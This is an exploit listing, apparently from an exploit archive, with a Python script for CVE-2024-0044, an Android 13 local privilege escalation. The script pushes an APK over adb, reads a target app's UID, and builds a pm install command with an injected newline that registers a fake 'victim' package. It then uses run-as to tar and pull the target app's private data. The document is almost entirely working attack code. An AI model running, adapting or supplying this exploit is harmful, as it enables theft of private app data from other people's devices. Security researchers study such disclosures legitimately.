Share
## https://sploitus.com/exploit?id=PACKETSTORM:190588
# Exploit Title: Android 13 - Local Privilege Escalation
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 13
# Tested on: Win, Ubuntu
# CVE : CVE-2024-0044
import argparse
import subprocess, os
GREEN = "\033[32m"
CYAN = "\033[36m"
BOLD = "\033[1m"
RESET = "\033[0m"
CHECK_MARK = "\u2714"
ERROR_MARK = "\u2716"
class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter,
argparse.RawDescriptionHelpFormatter):
pass
def display_banner():
print(f'''{GREEN}
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#
{CYAN}''')
parser = argparse.ArgumentParser(
description='CVE-2024-0044: run-as any app ',
formatter_class=CustomFormatter,
epilog= display_banner()
)
parser.add_argument("-P", help="package name", required=True)
parser.add_argument("-A", help="apk file path", required=True)
args = parser.parse_args()
package_name = args.P
apk_path = args.A
create_extraction_directory_commands = [
"mkdir /data/local/tmp/wa/",
"touch /data/local/tmp/wa/wa.tar",
"chmod -R 0777 /data/local/tmp/wa/"
]
adb_path = 'adb'
remote_file_path = '/data/local/tmp/wa/wa.tar'
local_file_path = './wa.tar'
def push_apk(apk_path):
try:
if not os.path.isfile(apk_path):
print(f"Error: APK file '{apk_path}' does not exist.")
return False
result = subprocess.run(['adb', 'push', apk_path,
'/data/local/tmp/'], capture_output=True, text=True)
if result.returncode != 0:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error:
{result.stderr.strip()}")
return False
print(f"{CYAN}{BOLD}[{CHECK_MARK}] Successfully pushed
'{GREEN}{apk_path}{CYAN}' to
'{GREEN}/data/local/tmp/{os.path.basename(apk_path)}{CYAN}'")
return True
except Exception as e:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] An error occurred: {e}")
return False
def get_app_uid(package_name):
try:
result = subprocess.run(['adb', 'shell', f'pm list packages -U |
grep {package_name}'], capture_output=True, text=True)
if result.returncode != 0:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error:
{result.stderr.strip()}")
return None
for line in result.stdout.splitlines():
if f'package:{package_name} uid:' in line:
uid = line.split('uid:')[1].strip()
print(f"{CYAN}{BOLD}[{CHECK_MARK}] Got the target uid for
{GREEN}{package_name}{CYAN} : {GREEN}{uid}{CYAN}")
return uid
return None
except Exception as e:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] An error occurred: {e}")
return None
def generate_payload(uid, apk_filename):
try:
payload = f"PAYLOAD=\"@null\nvictim {uid} 1 /data/user/0
default:targetSdkVersion=28 none 0 0 1 @null\"\npm install -i \"$PAYLOAD\"
/data/local/tmp/{apk_filename}"
with open('payload.txt', 'w') as f:
f.write(payload)
print(f"{CYAN}{BOLD}[{CHECK_MARK}] Payload generated and saved to :
{GREEN}'payload.txt'{CYAN}")
print(f"{GREEN}{payload}{GREEN}")
prompt_user_for_next_action()
except Exception as e:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] An error occurred: {e}")
def prompt_user_for_next_action():
while True:
user_input = input(f"{CYAN}{BOLD}Copy the above command in adb
shell. After you finish, type {GREEN}'y'{CYAN} to continue or
{GREEN}'n'{CYAN} to quit: ").strip().lower()
if user_input == 'y':
run_adb_commands(create_extraction_directory_commands)
break
elif user_input == 'n':
print("Exiting.")
break
else:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] Invalid input. Please type
'y' to continue or 'n' to quit.")
def prompt_user_to_run_as():
while True:
print(f"{GREEN}run-as victim\ntar -cf /data/local/tmp/wa/wa.tar
{package_name}{CYAN}")
user_input = input(f"{CYAN}{BOLD}Copy the above commands in adb
shell. Wait until the last command executes successfully. After you finish,
type {GREEN}'y'{CYAN} to continue or {GREEN}'n'{CYAN} to quit:
").strip().lower()
if user_input == 'y':
pull_with_progress("wa.tar")
break
elif user_input == 'n':
print("Exiting.")
break
else:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] Invalid input. Please type
'y' to continue or 'n' to quit.")
def pull_with_progress(filename, device_path="/data/local/tmp/wa/wa.tar"):
filesize = int(subprocess.check_output(["adb", "shell", "du -s",
device_path]).split()[0])
print(f"{CYAN}{BOLD}[{CHECK_MARK}] Downloading file:
{GREEN}{filename}{CYAN} (size: {GREEN}{filesize}{CYAN} bytes)")
with open(filename, "wb") as f:
process = subprocess.Popen(["adb", "shell", "cat", device_path],
stdout=subprocess.PIPE)
received = 0
total_bars = 20
while True:
data = process.stdout.read(1024)
if not data:
break
received += len(data)
f.write(data)
percent = int((received / filesize) * 100)
print(f"Progress:{GREEN}{percent}{CYAN}", end="\r")
print(f"\n{CYAN}{BOLD}[{CHECK_MARK}] Download complete:
{GREEN}{filename}{CYAN}")
def run_adb_commands(commands):
for command in commands:
full_command = f"adb shell {command}"
try:
result = subprocess.run(full_command, shell=True, check=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print(f"{CYAN}{BOLD}[{CHECK_MARK}] Command
{GREEN}'{command}'{CYAN} executed successfully:
{result.stdout.decode().strip()}")
except subprocess.CalledProcessError as e:
print(f"{CYAN}{BOLD}[{ERROR_MARK}] Error executing command
{GREEN}'{command}'{CYAN}: {e.stderr.decode().strip()}")
prompt_user_to_run_as()
if __name__ == "__main__":
try:
if apk_path.endswith('.apk'):
success = push_apk(apk_path)
if success:
apk_filename = os.path.basename(apk_path)
uid = get_app_uid(package_name)
if uid:
generate_payload(uid, apk_filename)
else:
print(f"Could not find UID for the package
{package_name}")
else:
print(f"Failed to push the APK '{apk_path}'.")
except argparse.ArgumentError:
parser.print_help()